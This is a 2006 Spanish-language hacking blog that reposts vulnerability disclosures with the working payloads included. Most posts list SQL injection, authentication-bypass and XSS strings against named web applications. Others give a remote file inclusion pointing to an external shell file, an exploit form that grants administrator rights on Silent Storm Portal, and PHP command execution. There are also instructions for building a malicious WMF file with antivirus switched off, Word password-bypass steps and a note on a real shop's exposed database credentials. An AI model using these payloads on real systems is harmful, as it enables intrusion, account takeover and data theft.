ecoestadistica.com

martes, enero 31, 2006

Internet Explorer 7 beta 2 para descargar

¿Quieres probar la última beta del navegador Internet Explorer 7?.

Pues ya puedes. Sólo debes de tener el SP2 instalado para que funcione.

Si te lo descargas, podrás comprobar en primera persona si es verdad que Microsoft se ha puesto las pilas con su IE7.

Fuente| Denken Uber.
Sitio Oficial | Internet Explorer 7 Beta 2.
Descarga | Beta 2 IE7.

Salu2


lunes, enero 30, 2006

Mozilla Firefox XBL -MOZ-BINDING Property Cross-Domain Scripting Vuln.

Mozilla Firefox hasta la version 1.5, es propenso a una vulnerabilidad de la seguridad que pueda dejar una página del Web ejecutar código malévolo en el contexto de un dominio arbitrario.
La edición afectada es la propiedad '-moz-binding' .
Esto podía permitir que un sitio malévolo tenga acceso a las características de un sitio y facilite varios ataques incluyendo acceso de la información sensible de dicho sitio.

Prueba de Concepto:

creamo la pagina

http://dominio1/path/to/pagina.html

con el siguiente contenido:

html>
head>
style>
body { -moz-binding: url("http://dominio2/path/to/xbl.xml#xss"); }
/style>
/head>
body>
/body>
/html>

donde en:

http://dominio2/path/to/xbl.xml

debe contener:


?xml version="1.0"?>
bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">

binding id="xss">
implementation>
constructor>
alert("XBL XSS");
/constructor>
/implementation>
/binding>

/bindings>

Referencia

Saludos

Nota: agregar los ¨<->¨ correpondientes en cada linea.

Vulnerabilidad y exploit (POC) para el Winamp 5.12

Se ha publicado un nuevo exploit para el Winamp, uno de los reproductores mas populares. El exploit utiliza una vulnerabilidad que afecta a la versión 5.12, la última a fecha de hoy, y prosiblemente a las anteriores.

La vulnerabilidad está causada por un Buffer Overflow explotable mediante los archivos de lista de reproducción (o playlist, con extensión .pls). Al abrir una lista de reprocucción especialmente modificada, el overflow causado en el Winamp permite la ejecución de comandos en el sistema.

Aunque la forma de explotarlo es en principio local, con lo cual su gravedad a simple vista puede parecer poca, el ataque puede realizarse remotamente (con intervención de la víctima), porque un atacante podría colgar el archivo .pls en una web y dirigir a su víctima hacia él mediante un link en una web, email, etc.

Código:
html><>< src="crafted.pls">< /iframe> < /body >< /html

Si la víctima utiliza el Internet Explorer, el archivo .pls se ejecutará automáticamente, comprometiendo el sistema. El Firefox abre un cuadro de diálogo para descargarlo o ejecutarlo. Aunque el exploit publicado es una "prueba de concepto" y crea el archivo "crafted.pls" que al ser abierto con el Winamp simplemente abre la calculadora de Windows, puede ser modificado por un atacante para obtener uns shell remota en el sistema de la víctima.

Exploit: winamp_5.12_poc.rar
Demo: http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm

Actualización:
Según el foro de la web oficial del Winamp, ya han sacado un parche:

http://www.winamp.com/in_mp3.dll

Copia el archivo en la carpeta de plugins del Winamp
Según el foro, pronto saldrá la versión 5.13.

mas info: http://forums.winamp.com/showthread.php?threadid=236740

Origen: www.milw0rm.com
fuente:Cyruxnet

salu2

domingo, enero 29, 2006

XSS in rapidshare...

Se ha encontrado una vulnerabilidad del tipo XSS, en el sitio de alojamiento de archivos rapidshare.
La vulnerabilidad se localiza en el area de miembros premium

Prueba de Concepto:

https://ssl.rapidshare.de/cgi-bin/premiumzone.cgi?login=[XSSAQUI]&password=anything



Salu2

sábado, enero 28, 2006

Metasploit Portscanner

Copia el siguiente archivo, y guardalo en el directorio de exploits del metasploit, recuerda renombrarlo con la extension .pm.

CODIGO

Modo de Uso:

msf > use msf_scan
msf msf_scan > set RHOST 127.0.0.1
RHOST -> 127.0.0.1
msf msf_scan > set SPORT 20
SPORT -> 20
msf msf_scan > set STPORT 25
STPORT -> 25
msf msf_scan > exploit
[*] Starting Metasploit Port scanner by n3w7yp3...
[*] Scanning ports 20 through 25 on 127.0.0.1...
[*] Results of scan follow:
22/tcp OPEN
25/tcp OPEN
[*] Scan complete

Salu2

martes, enero 24, 2006

Vulnerabilidades...

ExpressionEngine 'Referer' XSS

Ejemplo de HTTP Query:

GET /path/index.php HTTP/1.0
Host: host
Referer: http:///XSS>.com/;

--------------------------------------------------------------
CheesyBlog XSS Vulnerability

Ejemplo de XSS:

http://host/cheesyblog/archive.php? entry=1

Agregue a comment

Your name: XSS
Your email address: cualquiera
Website URL: javascript:[code]
Comment: XSS

--------------------------------------------------------------

Pixelpost Photoblog XSS Vulnerability

http://host/pixelpost/index.php?popup=comment&showimage=1

Agregue a Comment: XSS

--------------------------------------------------------------

SleeperChat Input Validation Hole Permits Cross-Site Scripting Attacks

http://www.sitevuln.com/chat/index.php?pseudo=%3E%3Cscript%3Ealert(navigator.appVersion)%3C/script%3E&
txtlen=500&smiley=1

--------------------------------------------------------------

e-moBLOG Input Validation Bugs Permit SQL Injection Attacks

1. SQL Injection Ejemplo:

http://host/emoblog/index.php?monthy=2006017'%20union%20select%201,2,3,4,5,6,7,8,9,10/*#1

2. SQL Injection Ejemplo:

link: http://host/emoblog/admin/index.php
username: aaa' union select 'bbb','[md5-hash de cualquier password]'/*
password: [cualquiera]

Salu2

Post de Prueba...XSS

http://mousehack.blogspost.com/xss">

Microsoft se pone las pilas con su Internet Explorer 7

Grandes avances los dados por Microsoft en el desarrollo de su esperado Internet Explorer 7.

Ha mejorado las versiones beta anteriores y ya ni digamos el vetusto IE6, que cuando lo comparo con Opera o Firefox, parece de otro tiempo, de cuando esto de Internet empezó.

Porque no se entiende que algo tan vital como las pestañas no las tenga todavía y debamos esperar a este IE7 para disfrutarlas.

También han mejorado y mucho la interfaz, con iconos atractivos.

Por otro lado introducen la función QuickTabs que permite mediante un clic de ratón disponer de un vistazo de todas las pestañas activas del navegador, pudiendo manejarlas directamente desde ahí.

Otras puntualizaciones, son las mejoras con el CSS o la inclusión de Google como buscador en vez de MSN. Extraño.

Fuente | Denken Uber.

Salu2

lunes, enero 23, 2006

Vulnerabilidades...

e-moBLOG SQL injection

http://[target]/emoblog/index.php?monthy=2006017'%20union%20s elect%201,2,3,4,5,6,7,8,9,10/*#1

--------------------------------------------------------------

miniBloggie Authentication Bypass

pagina de Login:
http://host/minibloggie/login.php

User Name: ' or 1/*
Password: ' or 1/*

--------------------------------------------------------------

Azbb v1.1.00 Cross_Site_Scripting

h**p://www.[target]/post.php?nickname=">""

--------------------------------------------------------------

Text Rider Sensitive Information Disclosure

Ejemplo:

http://host/textrider/data/userlist.txt

salu2

domingo, enero 22, 2006

Vulnerabilidades...

Pixelpost Photoblog XSS Vulnerability

Link: http://host/pixelpost/index.php? popup=comment&showimage=1

Agregue comentario:

--------------------------------------------------------------

MyBB Signature HTML Code Injection

Ejemplo:
/img src=&#106a&#118a&#115c&#114i&#112t&#58a&#108e&#114t&#40'&#88S&#83'&#41
--------------------------------------------------------------

WHITEAlbum SQL Injection

http://[victim]/folder/pictures.php?dir=[SQL]

Google:
"PHP Album by whiteangle"

salu2

viernes, enero 20, 2006

Como saltarse las contraseñas de los documentos .doc...

Existen dos maneras en las que podemos eludir las contraseñas en documentos de Word, tanto para su versión 2000 como XP. Estas son maneras manuales de hacerlo, aunque hay aplicaciones que ya te permiten eludir las contraseñas en los documentos, pero son aplicaciones de pago, en todo caso indico los dos ejemplos:

- Ejemplo 1:
* Abres una página en blanco de MS Word.
* Vamos a Insertar -> Archivo y seleccionamos nuestro documento protegido por contraseña.
* Nos vamos al menú herramientas y desde allí seleccionamos “documento sin proteger” y ya no nos hará falta la contraseña.

-Ejemplo 2:
* Abres tu documento protegido en MS Word, aunque no podrás editarlo.
* Sálvalo como RTF (Rich tech format) y manténgalo abierto.
* Mientras el nuevo documento RTF está abierto, ve a Abrir archivo.
* Si te avisa de que si puedes cambiar de situación el documento, desde el menú de MS Word puedes indicarle “documento sin proteger” y ya no te saldrán más avisos de contraseña.


Fuente:Juanma

Salu2

jueves, enero 19, 2006

Mini-Tutorial del uso de WMFmaker...

A pedido de algunos visitantes amigos,este es un mini-tutorial de la herramienta ¨WMFmaker¨,en el cual solo me limitare a la creacion del archivo ¨evil.wmf¨...el resto de la utilidad que le pudieran dar a la misma queda a su imaginacion...

1.-En primer lugar debemos tener instalada esta tool, la cual la pueden bajar del enlace que puse en un post anterior.Dejo aclarado que para poder bajar e instalar esta herramienta, deberan tener el anti-virus desactivado, como asimismo durante su uso, de lo contrario se eliminara o bloqueara...
Una vez instalada,que recomiendo que lo hagan en C:\, por una cuestion practica, abrimos una ventana de comandos y nos posicionamos en el directori0 creado...
2.- Ahora realizamos un ¨DIR¨, para saber con que archivos contamos dentro del directorio, y si existe un ejecutable...lo cual es facilmente comprobable...
3.-A continuacion procedemos con la ejecucion de ese archivo y nos encontramos con la novedad de que requiere de otro conjuntamente con el ejecutable para que la herramienta funcione...(file with payload)...





4.-Realizamos nuevamente un ¨DIR¨, y nos encontramos con el archivo ¨main.cpp¨, que si lo abrimos con cualquier editor de texto, nos percatamos de que se trata de un exploit escrito en C++ para uso del Metasploit Framework a lo cual ya me referi anteriormente...
5.-Procedemos a efectuar la ejecucion del exe, en conjunto con el archivo anterior (main.cpp) y observamos que se produce la creacion del archivo ¨evil.wmf¨, que seria nuestro archivo malicioso...
6.-Verificamos la creacion del archivo que vamos a utilizar y que posee la shellcode, haciendo nuevamente ¨DIR¨...lo que resulta positiva... Salu2

ICQ XSS Vuln.

ICQ.com search script (search_result.php) es vulnerable a un ataque de cross-site
scripting.
El problema es debido a un fracaso en la aplicación de tratar apropiadamente la consulta del usuario.
La consulta demuestra la vulneravilidad en 2 variables (gender and home_country_code).

Prueba de Concepto:

Prueba 1

Prueba 2

Detalles de la Explotacion con capturas de pantalla AQUI

Salu2

Google's Blogger.com classic HTTP response splitting vulnerability...

El mecanismo personal de la redireccion de la página de Blogger contiene una respuesta clásica de HTTP que es vulnerable en el encabezamiento HTTP de "Location".La explotación de la vulnerabilidad puede llevar a la utilizacion de XSS, cache poisioning y ataques de phishing.

El URL siguiente toma el contenido de la pregunta y lo utiliza en el encabezamiento HTTP "Location" sin el saneamiento apropiado:

http://www.blogger.com/r?[URL AQUI]

Prueba de Concepto:

http://www.blogger.com/


Salu2

miércoles, enero 18, 2006

Vulnerabilidades...

WebspotBlogging Authentication Bypass

Link: http://host/webspot/login.php
Username: aaaa' union select 1,2,3,1,1,6, 7/*
Password: cualquiera

--------------------------------------------------------------

SaralBlog XSS & Multiple SQL Injection

1. SQL Injection Ejemplo:
http://host/viewprofile.php? id=999%20union% 20select%201, 2,3,4,5,6,7/*


2. SQL Injection Ejemplo (gpc_magic_quotes: off):

Search:
aaaaa') union select 1,2,3,4,5,6/*


3. Cross-Site Scripting

agregue un nuevo comentario:
Website: javascript:alert(123

--------------------------------------------------------------

PowerPortal XSS

Vuln XSS :
http://www.example.com/modules/content/search.php?func=results&search=[XSS]
http://www.example.com/modules/content/search.php?search=[XSS]&func=results
http://www.example.com/modules/links/index.php?search=[XSS]func=search_results

--------------------------------------------------------------

Phpclanwebsite BBCode IMG Tag XSS

img]javascript:alert('XSS')[/img

--------------------------------------------------------------

XMB Forum HTML Code Injection

postee este codigo:
img src=javascript:alert('XSS')

--------------------------------------------------------------

Land Down Under Signature HTML Code Injection

Ejemplo:
STYLE =text/css>BODY { background-image: url('http://www.geocities.com/night_warrior771/
blank.jpeg'); }/STYLE

--------------------------------------------------------------

Vulnerabilidades descubiertas por night_warrior771
night_warrior771[at]hotmail.com

salu2

martes, enero 17, 2006

Mini-Paper: XSS con Reverse Proxys...

El Cross Site Scripting (XSS) requiere que el sitio web objetivo sea susceptible (por lo menos hasta cierto punto) a la inyección de html y script injection.. Este requisito está restringido debido a limitaciones incorporadas de DOM: navegadores Modernos restringen javascript, en una ventana de interactuar con otra ventana, a menos que ambos pertenescan al mismo dominio(protocol + server name + port). Este mini-paper describe cómo vencer este requisito, y muestra un ataque posible de XSS en una aplicación, incluso si no es XSS-VULNERABLE en un todo.

El ataque básico es sencillo de crear y verificar. Requiere a un servidor Apache que recibe una página de HTML con el código del ataque, y eso corre un reverse http proxy. Los reverse proxy se configuran para retransmitir algunos pedidos de http al sitio web de la víctima.

La página del ataque contiene un iframe que señala en la dirección proxys-retransmitido en el servidor Apache local. Creando un iframe que es ,según cabe suponer, en el mismo dominio del atacante, se puede conseguir acceso al contenido del iframe.

***Reverse Proxy XSS attack***

Veamos un ejemplo sencillo. El sitio de la víctima contiene una página web:
http://www.victim.com/v_page.html

v_page codigo:

HTML>
BODY>
form name="f1" id="f1">
input name="in1" id="in1" value="somethingOther">
/form>
/BODY>
/HTML>

El sitio del atacante se llama http://www.victima.com.victin.com El servidor apache del atacante es configurado para servir el HTML document desde el directorio/xss, y tiene las siguientes
definiciones inversas de proxys:

ProxyPass /http://www.victima.com/
ProxyPassReverse / http://www.victim.com/

Dentro del directorio local XSS, existe un documento llamado ¨pagina_X.html¨, con el siguiente codigo:

HTML>

BODY onLoad="xyz()">
shalom
iframe name="win1111" id="win1111" src="http://www.victim.com/v_page.html">
/iframe>
script language="javascript">
function xyz () {
var x;
x=window.frames['win1111'].document.f1.in1.value;
alert(x);
}
// alternative to onload
// setTimeout("xyz()", 3000);
/script>
/BODY>
/HTML>

Cuándo alguien realiza el acceso a la dirección: http://www.victim.com.victin.com/xss/x_page.html
el navegador cargará la página del sitio web atacante y la tentativa para conseguir acceso a su contenido.Mientras la carga triunfa, el intento del acceso falla.
Sin embargo, cuando la página atacante se modifica para referirse al relevo de proxys:

iframe name="win1111" id="win1111" src="/v_page.html">

Esta vez,el script no fallará. Permitirá al atacante conseguir acceso y modificar el contenido
del sitio web de la víctima.
Este arreglo permitirá también el acceso completo de la sesión de http en el sitio de víctima (URLs y cookies).

Anton Rager's XSS-Proxy se pueden utilizar en este ataque para mejor control de la sesión asaltada.

En un ataque de pharming, un DNS cache se puede envenenar para señalar www.victim.com directamente al sitio web del atacante, mientras el maneja la resolución correcta
de IP en los archivos del host local. Un ataque de phishing/pharming consiste generalmente en que un intruso crea un facsímile del sitio web de víctima. Con reverse proxys,
ese facsímile es no requerido, haciendo más fácil de crear un ambiente genérico para ataques de tipo http MITM.

** Referencias **
1) mod_proxy - Apache HTTP Server
http://httpd.apache.org/docs/2.0/mod/mod_proxy.html
2) Anton Rager's XSS-Proxy paper
http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt
3) Remote Scripting with IFRAMEs
http://developer.apple.com/internet/webcontent/iframe.html
4) CGISecurity's Cross Site Scripting FAQ
http://www.cgisecurity.com/articles/xss-faq.shtml
5) Gunter Ollmann's XSS paper
http://www.technicalinfo.net/papers/CSS.html
6) PeterW's Cross Site Request Forgery (CSRF) Concept
http://www.securityfocus.com/archive/1/191390
7) An online version of this paper
http://www.venera.com/downloads/reverse-proxy-xss.txt

Salu2

lunes, enero 16, 2006

Php-Nuke Security Bypass...


Download

Video-tutorial: ¨Como hackear una PC¨

Este VIDEO, parte de una estrategia de comercializacion de un producto llamado Fiberlink Extend360, pero resulta educativo, para demostrar lo que se necesita para realizar el hackeo de una PC en un sistema wireless.

El vídeo demuestra las herramientas a utilizar para explorar una red inalambrica, determinar las cuentas del usuario, si la cuenta está apagada o encendida, cómo unirse a la PC usando el accesorio nulo de la sesión, y cómo utilizar una herramienta compilada para tener el acceso del comando a la PC de la victima.

Se explica como cerrar el antivirus remotamente;Después crean una carpeta en la PC comprometida y la comparten.Entonces, conectan con la carpeta compartida y explican cómo conseguir las identificaciones de usuario y las contraseñas. Utilizan el pwdump para descargar el SAM entero (donde se almacena el username y password). También le demuestran cómo copiar de un archivo de la configuración del Cisco VPN y explican cómo utilizarlo.

Tambien demuestran como romper las contraseñas del usuario usando el ¨CAIN¨.Despues instalan un troyano(subseven), para volver a conectarse a la PC victima reiteradamente.

interesante...

Salu2

Microsoft(R) Internet Explorer 5 & 6 Remote Denial of Service (DoS) usando los elementos IMG & XML

Descripción

Se ha encontrado que el Internet Explorer 5 y el Internet Explorer 6 son vulnerables a una denegación del servicio.
El ¨error¨ se produce por los datos erroneos del HTML combinados con un bloque erroneo de XML, ocultado todo ello dentro de una Web, etc.

Prueba de Concepto:

Cualquier Web que contiene el código HTML siguiente causará el DOS:



PRUEBA


Vulnerabilidad descubierta por:
Inge Henriksen

Salu2

Vulnerabilidades...

BlogPHP Authentication Bypass

Link:
http://host/index.php? act=login

username: a' or 1/*
password: cualquiera

----------------------------------------------------------

microBlog BBCode XSS

BBcode Ejemplo:

[url=javascript:alert(123)]title[/url]

-----------------------------------------------------------

microBlog SQL Injection

SQL Injection Ejemplo:

http://host/microblog/index.php? month=1&year=9999% 20union%20select% 201,2,3,4,5, 6,7,8,9,10, 11,12,13,14/*

------------------------------------------------------------

Netbula Anyboard "tK" XSS Vuln

http://[host]/cgi-bin/anyboard.cgi?pvp=main/&cmd=find&tK=[code]&hIz

------------------------------------------------------------

Faq-O-Matic XSS Vuln


http://[victim]/fom.cgi?cmd=recent&file=1&showLastModified=show&_submit=Show+documents&_duration=[code]
http://[victim]/fom.cgi?file=[code]&showLastModified=show
http://[victim]/fom.cgi?_insert=answer&cmd=[code]&file=1

-------------------------------------------------------------

GTP iCommerce XSS Vuln

http://[host]/index.php?page=listStory&cat=Programs+and+Services&subcat=[code]
http://[host]/index.php?page=listStory&cat=[code]

-------------------------------------------------------------

RedKernel Referrer Tracker "rkrt_stats.php" XSS

http://[host]/rkrt_stats.php?refs,,Last_7,0,">[code]

-------------------------------------------------------------

Ultimate Auction XSS Vuln

http://[victim]/cgi-local/auktion/item.pl/item.pl?item=[code]
http://[victim]/cgi-local/auktion/itemlist.pl?category=[code]

Salu2

El hackeo de los nuevos DVDs...

El hacker noruego Jon Lech Johansen, más conocido como DVD Jon por haber roto el sistema de protección de los DVDs, ha registrado el dominio DeAACS.

AACS (Advanced Access Content System), es el sistema de protección que incoporarán tanto Blu-ray como HD-DVD, el cual empleará un sistema de encriptación mas fuerte que CSS (128 bits frente a 40) y habrá distintas claves para diferentes grupos de reproductores, de modo que si alguna de ellas es crackeada las nuevas películas no la emplearán, quedando dichos reproductores supuestamente inutilizables con las nuevas películas.

El pasado 14 de abril se publicó la versión 0.9 de las especificaciones AACS y su pronta finalización es muy importante dado que de ellas depende la comercialización de ambos formatos.

Aunque Jon Lech Johansen parece dispuesto a amargarle la fiesta a la industria, por lo pronto ya dispone del dominio DeAACS ;-).

Mas Info

Fuente:hispamp3

Salu2

Multiple Vulns en Silent Storm Portal

Software:
Silent Storm Portal

Sitio Web:
http://www.silent-storm.co.uk/ssp/


Version Afectada:
2.1,2.2

XSS vuln.

Prueba de Concepto:

http://www.victim.com/index.php?module=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E

Vuln Acceso administrativo no Autorizado:

Prueba de Concepto:

Silent Storm Portal almacena la informacion de las cuentas, username y password. en el archivo ¨users.dat¨.Este archivo contiene la informacion en texto plano.

Demostracion:
Registre una cuenta de usuario, y ejecute el siguiente exploit.html

form method="post" action="http://www.victim.com/index.php?module=../../profile" >
< input type="text" name="mail" value="any_at_mail.com">< br>
< input type="hidden" name="mail" value="< ~>1<~>" >
< input type="submit" name="post" value="Get Admin!" >
< /form

Ejemplo de Archivo de la Base de Datos(antes de la ejecucion del exploit)
Cuenta<~>password<~>mail.com<~>2<~><~><~><~><~>
Nivel:Usuario Normal

Ejemplo(despues de la ejecucion)
Cuenta<~>password<~>mail.com<~>1<~><~>2<~><~><~><~><~><~><~>
Nivel Injectado:Administrador

Usted Obtendra el mensaje ¨"Updated Your Profile Sucessfuly !" despues de la ejecucion del exploit.html.Salga y reingrese con su username y password en "AdminPanel¨(index.php?module=../../apanel ) y tendra todos los privilegios del administrador.

El siguiente es otro ejemplo de codigo, que crea directamente una cuenta de administrador en el portal de la victima:

form method="post" action="http://www.victim.com/index.php?module=../../Home">
User:< input type="text" name="usr" size="10" >< br>
Pass:< input type="password" name="pas" size="10" >< br>
< input type=hidden name="ema" value="any_at_mail.com<~>1<~>">< br>
< input type="submit" name="reg" value="Create Admin!" >
< /form


Salu2

domingo, enero 15, 2006

WMF nDay download() Exploit Generator

La gente de ¨Unl0ck Research Team¨ ha creado un nuevo exploit para seguir probando este ¨defecto¨ de windows en el tratamiento de los archivos metafile.

Lo puedes descargar de el siguiente enlace:

Exploit

Modo de Uso:

wmf_expl.exe [url] [-t]

(la opcion ¨t¨ sirve para testear la shellcode)

salu2

sábado, enero 14, 2006

Vulnerabilidades....

HomeFtp v1.1 Denegacion de Servicio

Negación del servicio:
Un ataque del negacion de servicio (también, DOS) es un ataque contra un sistema informático o una red que causen una pérdida de servicio a los usuarios, típicamente la pérdida de conectividad y de servicios de la red consumiendo la anchura de banda de la red de la víctima o sobrecargando los recursos de cómputo del sistema de la víctima.

Exploit para esta Vulnerabilidad:

homeftp_v1.1_xpl.c

-----------------------------------------------------------

it 5 Blog SQL Injection & Authentication Bypass

Authentication bypass ejemplo (SQL Injection):

http://host/admin/index.php

User Name: a' or 1/*
Password: a' or 1/*

-----------------------------------------------------------

Benders Calendar SQL Injection

Year" "Month" or "Day" value:

999' union select 1,2,3,4,5,6/*

-----------------------------------------------------------

geoBlog SQL Injection

SQL Injection Ejemplo:

http://host/geoblog/viewcat.php? cat=I'% 20union%20select% 201,2,3,4,5, 6,7/*

-----------------------------------------------------------

Bit 5 Blog JavaScript Insertion

Ejemplo:




clickme

salu2

Polémica por el bug WMF de Windows...

"La única conclusión que se puede razonablemente extraer es que ésta fue una puerta trasera deliberada, colocada en todas las versiones recientes de Microsoft Windows. POR QUÉ fue puesta y QUIÉN lo sabía, y PARA QUÉ esperaban utilizarla... nunca lo sabremos."

(Steve Gibson, GRC.com)

Es difícil saber por qué, pero hay veces en que alguien decide jugarse toda su reputación a una sola carta.

Y es que las recientes declaraciones de Steve Gibson (experto en seguridad informática, bien conocido por su labor al frente de GRC.com) no van a pasar desapercibidas, y son de las que pueden comprometer -para bien o para mal- el nombre de alguien de por vida.

Gibson, en base a más o menos complejas indagaciones técnicas, afirma que el reciente bug en la visualización de ficheros WMF constituye una auténtica puerta trasera, que fue colocada en las últimas versiones de Windows a propósito.

El debate está servido y, de momento, prácticamente nadie contradice los detalles técnicos, aunque sí varían -y mucho- las interpretaciones.

De lo que no cabe ninguna duda es de que a Gibson -como a todo creador de opinión que se precie- no le faltan detractores, que, llegado el caso, le harán pagar muy caro su atrevimiento...

Microsoft se explica y desmiente las atrevidas afirmaciones de Gibson.

Interesante articulo de kriptopolis...

salu2

MiniNuke 1.8.2 SQL inyection

Se ha descubierto una vulnerabilidad en sistema MiniNuke versiones anteriores a 1.8.2, por el cual con una inyeccion SQL se puede ver todos los datos de cualquier usuario,incluso cambiar el password del admin, etc...
La inyeccion se realiza en el archivo news.asp:


GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]


http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52


Exploit para cambiar el password de cualquier usuario AQUI

Salu2

viernes, enero 13, 2006

Vulnerabilidades...

H-Sphere Security Vulnerability

-Vulnerabilidad
H-Sphere Hosting Control Panel XSS

-Vendedor
Positive Software (www.psoft.net)

-Sistema Afectado
* H-Sphere (<= 2.4.3 Patch 8) Prueba de Concepto

http://cp.example.com/psoft/servlet/psoft.hsphere.CP?action=login&login=[XSS]

-------------------------------------------------------------

Phpauction version 2.5 remote file inclusion

Prueba de concepto:

/includes/stats.inc.php?prefix=Http://victim.com/shell.txt? ------------------------------------------------------------

Wordcircle Authentication Bypass

Prueba de Concepto
Login Page:
http://host/index.php? a=login
Enter your email address: any
Enter your password: a' or 1/*

------------------------------------------------------------

Light Weight Calendar PHP Code Execution

Prueba de Concepto

Ejemplo de Codigo PHP ejecucion

http://host/lwc/index.php? stam=1928504&date=20050901);% 20echo%20(% 60ls%20-la% 60&View=month

------------------------------------------------------------

AlstraSoft Template Seller Pro XSS

Prueba de Concepto

http://vicktimhost/template/fullview.php?tempid=[XSS] ------------------------------------------------------------

Domain Trader XSS

Prueba de Concepto

http://domaintrader.smartscript.net/catalog.php?id=[XSS]

------------------------------------------------------------

DCP Portal XSS

Prueba de Concepto

http://vicktimhost/calendar.php?show=full_month&s=1&submit=GO&day=[XSS] http://vicktimhost/search.php--> escriba este codigo--> <> alert('XSS');< / sc rip t>

jueves, enero 12, 2006

Actualizacion: Videos hacking...

Blind SQL Injection


LOTFREE TEAM hacking tutorial


Videos de phreaknic 9

[VID] 2005-10-21 - Phreaknic 9 - 001 - Dolemite Opening Remarks.avi 23-Oct-2005 22:50 37M 6:25
[VID] 2005-10-21 - Phreaknic 9 - 002 - Catonic - Professional WiFi.avi 23-Oct-2005 23:39 321M 55:13
[VID] 2005-10-21 - Phreaknic 9 - 003 - dc0de - Outbound Content Compliance.avi 24-Oct-2005 00:20 271M 46:34
[VID] 2005-10-21 - Phreaknic 9 - 004 - MaxieZ - Web Security 101.avi 24-Oct-2005 09:54 188M 32:20
[VID] 2005-10-21 - Phreaknic 9 - 005 - Rodney Thayer - A Security Analysis of Skype.avi 24-Oct-2005 10:14 258M 44:22
[VID] 2005-10-21 - Phreaknic 9 - 006 - Prof. Robert Knop - Blender.avi 24-Oct-2005 10:53 268M 46:08
[VID] 2005-10-21 - Phreaknic 9 - 007 - Virgil - Artificial Life.avi 24-Oct-2005 11:06 367M 63:10
[VID] 2005-10-21 - Phreaknic 9 - 008 - Acidus - Layer 7 Fun - Extending Web Apps in Interesting Ways.avi 24-Oct-2005 04:03 359M 61:42
[VID] 2005-10-21 - Phreaknic 9 - 009 - Drunken DDR.avi 24-Oct-2005 12:54 448M 76:53
[VID] 2005-10-22 - Phreaknic 9 - 010 - nathe - Dr. Cablelove.avi 25-Oct-2005 00:58 326M 55:59
[VID] 2005-10-22 - Phreaknic 9 - 011 - Kenneth Swain - Hacker to Professional.avi 25-Oct-2005 01:37 286M 49:11
[VID] 2005-10-22 - Phreaknic 9 - 012 - Critical Mass - Identity Theft.avi 25-Oct-2005 12:14 291M 50:00
[VID] 2005-10-22 - Phreaknic 9 - 013 - Dolemite - MythTV.avi 25-Oct-2005 03:08 336M 57:44
[VID] 2005-10-22 - Phreaknic 9 - 014 - Decius and Rattle - Information Warfare for The People.avi 25-Oct-2005 03:59 348M 59:49
[VID] 2005-10-22 - Phreaknic 9 - 015 - Adam Meyers - Smoke and Mirrors.avi 25-Oct-2005 04:23 166M 28:32
[VID] 2005-10-22 - Phreaknic 9 - 016 - Skydog, Qui-Gon, Sysmin - Wifi Panel.avi 25-Oct-2005 04:58 248M 42:39
[VID] 2005-10-22 - Phreaknic 9 - 017 - Strick - Croquet.avi 25-Oct-2005 05:53 396M 67:57
[VID] 2005-10-22 - Phreaknic 9 - 018 - Amy Sturgis - Still Big Brother.avi 25-Oct-2005 07:13 500M 85:55
[VID] 2005-10-22 - Phreaknic 9 - 019 - Decius - Rant.avi 25-Oct-2005 08:11 346M 59:24
[VID] 2005-10-22 - Phreaknic 9 - 020 - Awards.avi 25-Oct-2005 08:35 144M 24:45
[VID] 2005-10-22 - Phreaknic 9 - 021 - noxfu - C0m3dy Phr3@k$ $t@Nd#p c0M3dy Sh0W.avi 25-Oct-2005 18:14 404M 74:27

Cute News 1.4.0 Command Execution

salu2

Fallo en tienda Online (http://www.coppel.com)

Otro grave fallo de seguridad, reportado en una web chilena, que revela informacion sensible de su base de datos, ha sido publicado.

Se trata de la pagina http://www.coppel.com/

El fallo esta localizado en un archivo .inc lo cual es extremadamente riesgoso para este tipo de web, ya que se obtiene acceso al user y password de la base de datos , concretamente, a mas de 5 bases diferentes con login de proveedores, users y passwords de los mismos, usuarios de la web, "carrito online", creditos, y mas datos que se pueden observar ingresando a la base MySql.

Mas Info del Fallo...

Salu2

miércoles, enero 11, 2006

Visual Studio-Ejecucion de Codigo...

Microsoft Visual Studio es una herramienta desarrolada por Microsoft que brinda a los programadores la posibilidad de crear programas que funcionen bajo Windows.

Microsoft Visual Studio se ha diseñado para ejecutar la parte del código proporcionado por el usuario cuando exhibe la forma que contiene UserControls. El código malévolo será ejecutado automáticamente siempre que el archivo se abra en visual studio.

Sistema Vulnerable:
* Visual Studio 2005

Si un UserControl se agrega a una forma, el visual studio lanzará el código dentro de la función de UserControl_Load automáticamente siempre que el usuario decida la visión desde la forma principal donde se localiza el UserControl. La ejecución ocurre sin la advertencia, y no requiere al usuario compilar o ejecutar el proyecto.

Prueba de Concepto:

Descargue este archivo
Abra el archivo vbexploit.sln
Click en Form1.cs

Si un usuario hace click en el archivo (vbexploit.sln) y se muestra el form1.cs, se produce el lanzamiento del código dentro de la función de UserControl1_Load. Coloque su backdoor en esta función (usted puede utilizar el WIN-API y .NET framework para cifrar su backdoor). El comportamiento de defecto para el archivo del ejemplo es la demostración de un mensaje y la ejecucion de calc.exe.

Mas Info:Securityfocus

salu2

AspTopSites SQL injection...

Producto afectado:

AspTopSites
http://www.maine-net.com/aspts.asp

Detalle:

SQL Injection

AspTopSites no filtra el SQL resultando en el acceso completo al menu de administracion

Prueba de Concepto:

La declaracion de SQl injection en el campo de la contraseña causa que la declaración sea verdad.

http://[host]/topsites/default.asp <--- vea las listas
http://[host]/topsites/goto.asp?id=43 <--- mouseover valor de identificacion
http://[host]/topsites/includeloginuser.asp <--- login aqui
user: [ id value ]
password: 'or'

Fuente:hackers-news

Salu2

PayPal Phishing Site Explotando la Vuln XSS en Google...

Hay un sitio nuevo de phishing de PayPal que es astuto en procurar esconder su dirección verdadera del visitante. Los usuarios confiados quizás caigan en este engaño.

Se trataria de un ataque de tipo XSS a Google, que el sitio de phishing utiliza para empezar su cebo y el engaño del visitante. Lea detalles completos y mire el video capturado de esta estafa AQUI

Video Ilustrativo

Con respecto a la vulnerabilidad XSS en Google, ya hice referencia en post anteriores, solo a titulo de ejemplo de como se podria explotar un redireccionamiento usando a GOOGLE

Salu2

